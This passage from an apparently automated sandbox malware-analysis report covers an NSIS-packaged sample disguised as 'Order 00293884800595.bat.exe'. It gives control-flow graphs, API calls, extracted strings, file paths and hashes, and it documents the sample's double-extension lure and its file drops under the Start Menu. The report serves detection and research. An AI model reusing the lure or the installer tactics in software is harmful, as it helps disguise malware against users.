                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-769340183
                                                  • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                                  • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                                  • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                                  • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 387 402f81-402f86 384->387 388 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 384->388 389 403161-403165 387->389 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 403 4030b4-4030b7 396->403 404 403107-40310c 396->404 399 402fc4-402fdb 397->399 401 402fdd 399->401 402 402fdf-402fe8 call 40337a 399->402 401->402 410 40310e-403116 call 402ecd 402->410 411 402fee-402ff5 402->411 406 4030b9-4030d1 call 403390 call 40337a 403->406 407 4030db-403105 GlobalAlloc call 403390 call 403168 403->407 404->389 406->404 432 4030d3-4030d9 406->432 407->404 431 403118-403129 407->431 410->404 415 403071-403075 411->415 416 402ff7-40300b call 405ddb 411->416 420 403077-40307e call 402ecd 415->420 421 40307f-403085 415->421 416->421 435 40300d-403014 416->435 420->421 426 403094-40309c 421->426 427 403087-403091 call 40676c 421->427 426->399 430 4030a2 426->430 427->426 430->396 436 403131-403136 431->436 437 40312b 431->437 432->404 432->407 435->421 439 403016-40301d 435->439 441 403137-40313d 436->441 437->436 439->421 440 40301f-403026 439->440 440->421 442 403028-40302f 440->442 441->441 443 40313f-40315a SetFilePointer call 405ddb 441->443 442->421 444 403031-403051 442->444 447 40315f 443->447 444->404 446 403057-40305b 444->446 448 403063-40306b 446->448 449 40305d-403061 446->449 447->389 448->421 450 40306d-40306f 448->450 449->430 449->448 450->421
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402F42
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Order 00293884800595.bat.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                                    • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                                    • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                                  • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                                  Strings
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                                  • C:\Users\user\Desktop\Order 00293884800595.bat.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                                  • Error launching installer, xrefs: 00402F81
                                                  • Null, xrefs: 00403028
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                                  • 8TA, xrefs: 00402FBF
                                                  • Inst, xrefs: 00403016
                                                  • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                                  • soft, xrefs: 0040301F
                                                  • "C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00402F37
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order 00293884800595.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1323520412
                                                  • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                                  • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                                  • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                                  • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 451 406320-40632b 452 40632d-40633c 451->452 453 40633e-406353 451->453 452->453 454 406564-406568 453->454 455 406359-406364 453->455 456 406376-406380 454->456 457 40656e-406578 454->457 455->454 458 40636a-406371 455->458 456->457 461 406386-40638d 456->461 459 406583-406584 457->459 460 40657a-40657e call 40628d 457->460 458->454 460->459 463 406393-4063c9 461->463 464 406557 461->464 467 406501-406504 463->467 468 4063cf-4063d9 463->468 465 406561-406563 464->465 466 406559-40655f 464->466 465->454 466->454 471 406534-406537 467->471 472 406506-406509 467->472 469 4063f6 468->469 470 4063db-4063e4 468->470 474 4063fd-406405 469->474 470->469 473 4063e6-4063e9 470->473 477 406545-406555 lstrlenA 471->477 478 406539-406540 call 406320 471->478 475 406519-406525 call 40628d 472->475 476 40650b-406517 call 4061eb 472->476 473->469 480 4063eb-4063ee 473->480 481 406407 474->481 482 40640e-406410 474->482 489 40652a-406530 475->489 476->489 477->454 478->477 480->469 485 4063f0-4063f4 480->485 481->482 486 406412-40642d call 406174 482->486 487 406447-40644a 482->487 485->474 497 406432-406435 486->497 492 40644c-406458 GetSystemDirectoryA 487->492 493 40645d-406460 487->493 489->477 491 406532 489->491 498 4064f9-4064ff call 406587 491->498 494 4064e3-4064e6 492->494 495 406471-406474 493->495 496 406462-40646e GetWindowsDirectoryA 493->496 494->498 499 4064e8-4064ec 494->499 495->494 500 406476-406494 495->500 496->495 497->499 502 40643b-406442 call 406320 497->502 498->477 499->498 503 4064ee-4064f4 lstrcatA 499->503 504 406496-406499 500->504 505 4064ab-4064c3 call 4066b5 500->505 502->494 503->498 504->505 508 40649b-40649f 504->508 514 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 505->514 515 4064da-4064e1 505->515 512 4064a7-4064a9 508->512 512->494 512->505 514->494 514->515 515->494 515->500
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406452
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00000000), ref: 00406468
                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064C7
                                                  • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064D0
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064F4
                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00000000,00424440,763F23A0), ref: 00406546
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: T@$Call$G8g$Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-4009566976
                                                  • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                                  • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                                  • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                                  • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 806 40177e-4017a1 call 402c5e call 405c8c 811 4017a3-4017a9 call 40628d 806->811 812 4017ab-4017bd call 40628d call 405c1f lstrcatA 806->812 817 4017c2-4017c8 call 406587 811->817 812->817 822 4017cd-4017d1 817->822 823 4017d3-4017dd call 406620 822->823 824 401804-401807 822->824 832 4017ef-401801 823->832 833 4017df-4017ed CompareFileTime 823->833 825 401809-40180a call 405dfb 824->825 826 40180f-40182b call 405e20 824->826 825->826 834 4018a3-4018cc call 4053d1 call 403168 826->834 835 40182d-401830 826->835 832->824 833->832 849 4018d4-4018e0 SetFileTime 834->849 850 4018ce-4018d2 834->850 836 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 835->836 837 401885-40188f call 4053d1 835->837 836->822 869 40187a-40187b 836->869 847 401898-40189e 837->847 852 402af3 847->852 851 4018e6-4018f1 FindCloseChangeNotification 849->851 850->849 850->851 854 4018f7-4018fa 851->854 855 402aea-402aed 851->855 856 402af5-402af9 852->856 858 4018fc-40190d call 406320 lstrcatA 854->858 859 40190f-401912 call 406320 854->859 855->852 865 401917-4023af 858->865 859->865 870 4023b4-4023b9 865->870 871 4023af call 4059a3 865->871 869->847 872 40187d-40187e 869->872 870->856 871->870 872->837
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,00000031), ref: 004017BD
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,00000031), ref: 004017E7
                                                    • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                    • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
                                                    • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp$C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne$Call
                                                  • API String ID: 1941528284-2665453816
                                                  • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                                  • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                                  • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                                  • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 873 4053d1-4053e6 874 40549c-4054a0 873->874 875 4053ec-4053fe 873->875 876 405400-405404 call 406320 875->876 877 405409-405415 lstrlenA 875->877 876->877 879 405432-405436 877->879 880 405417-405427 lstrlenA 877->880 882 405445-405449 879->882 883 405438-40543f SetWindowTextA 879->883 880->874 881 405429-40542d lstrcatA 880->881 881->879 884 40544b-40548d SendMessageA * 3 882->884 885 40548f-405491 882->885 883->882 884->885 885->874 886 405493-405496 885->886 886->874
                                                  APIs
                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                  • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll
                                                  • API String ID: 2531174081-2128095855
                                                  • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                                  • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                                  • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                                  • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 887 403168-40317c 888 403185-40318e 887->888 889 40317e 887->889 890 403190 888->890 891 403197-40319c 888->891 889->888 890->891 892 4031ac-4031b9 call 40337a 891->892 893 40319e-4031a7 call 403390 891->893 897 403368 892->897 898 4031bf-4031c3 892->898 893->892 899 40336a-40336b 897->899 900 403313-403315 898->900 901 4031c9-403212 GetTickCount 898->901 904 403373-403377 899->904 902 403355-403358 900->902 903 403317-40331a 900->903 905 403370 901->905 906 403218-403220 901->906 907 40335a 902->907 908 40335d-403366 call 40337a 902->908 903->905 909 40331c 903->909 905->904 910 403222 906->910 911 403225-403233 call 40337a 906->911 907->908 908->897 920 40336d 908->920 913 40331f-403325 909->913 910->911 911->897 919 403239-403242 911->919 917 403327 913->917 918 403329-403337 call 40337a 913->918 917->918 918->897 924 403339-403345 call 405ec7 918->924 922 403248-403268 call 4067da 919->922 920->905 929 40330b-40330d 922->929 930 40326e-403281 GetTickCount 922->930 931 403347-403351 924->931 932 40330f-403311 924->932 929->899 933 403283-40328b 930->933 934 4032c6-4032c8 930->934 931->913 935 403353 931->935 932->899 936 403293-4032be MulDiv wsprintfA call 4053d1 933->936 937 40328d-403291 933->937 938 4032ca-4032ce 934->938 939 4032ff-403303 934->939 935->905 945 4032c3 936->945 937->934 937->936 942 4032d0-4032d7 call 405ec7 938->942 943 4032e5-4032f0 938->943 939->906 940 403309 939->940 940->905 948 4032dc-4032de 942->948 944 4032f3-4032f7 943->944 944->922 947 4032fd 944->947 945->934 947->905 948->932 949 4032e0-4032e3 948->949 949->944
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$@DB
                                                  • API String ID: 551687249-1316549817
                                                  • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                                  • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                                  • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                                  • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 950 406647-406667 GetSystemDirectoryA 951 406669 950->951 952 40666b-40666d 950->952 951->952 953 40667d-40667f 952->953 954 40666f-406677 952->954 955 406680-4066b2 wsprintfA LoadLibraryExA 953->955 954->953 956 406679-40667b 954->956 956->955
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                                  • wsprintfA.USER32 ref: 00406697
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                  • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                                  • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                  • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 957 402d60-402d89 call 406113 959 402d8e-402d92 957->959 960 402e43-402e47 959->960 961 402d98-402d9c 959->961 962 402dc1-402dd4 961->962 963 402d9e-402dbf RegEnumValueA 961->963 965 402dfd-402e04 RegEnumKeyA 962->965 963->962 964 402e28-402e36 RegCloseKey 963->964 964->960 966 402dd6-402dd8 965->966 967 402e06-402e18 RegCloseKey call 4066b5 965->967 966->964 969 402dda-402dee call 402d60 966->969 972 402e38-402e3e 967->972 973 402e1a-402e26 RegDeleteKeyA 967->973 969->967 975 402df0-402dfc 969->975 972->960 973->960 975->965
                                                  APIs
                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
